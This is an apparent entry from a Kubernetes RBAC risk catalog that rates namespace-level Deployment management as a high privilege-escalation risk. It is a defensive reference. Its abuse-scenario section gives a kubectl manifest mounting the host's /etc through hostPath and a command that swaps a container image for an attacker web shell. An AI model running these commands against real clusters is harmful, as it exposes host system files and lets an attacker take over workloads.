Manage Deployments in a namespace (potential for privileged pod execution)
Elevation of Privilege
High
Overview
| Field | Value |
|---|---|
| ID | 1034 |
| Name | Manage Deployments in a namespace (potential for privileged pod execution) |
| Risk Category | Elevation of Privilege |
| Risk Level | High |
| Role Type | Role |
| API Groups | apps |
| Resources | deployments |
| Risky Verb Combinations | [create] · [update] · [patch] · [delete] |
| Tags | Persistence PotentialPrivilegeEscalation Tampering WorkloadLifecycle |
Description
Grants permission to create, update, or delete Deployments within a specific namespace. This can be used to deploy pods with privileged settings within that namespace, potentially leading to privilege escalation, persistence, and tampering with applications.
Abuse Scenarios
- Create a new Deployment with a hostPath mount in the namespace.
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
name: hostpath-deployment
spec:
replicas: 1
selector:
matchLabels:
app: hostpath-app
template:
metadata:
labels:
app: hostpath-app
spec:
containers:
- name: hostpath-container
image: busybox
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- mountPath: /host-etc
name: host-etc
volumes:
- name: host-etc
hostPath:
path: /etc
EOF
# Example: kubectl create -n development -f - <<EOF ... EOF
- Update an existing Deployment’s image to a malicious one.
kubectl set image deployment/<deployment-name> <container-name>=<malicious-image> -n <namespace>
# Example: kubectl set image deployment/my-web-app web=attacker/web-shell -n default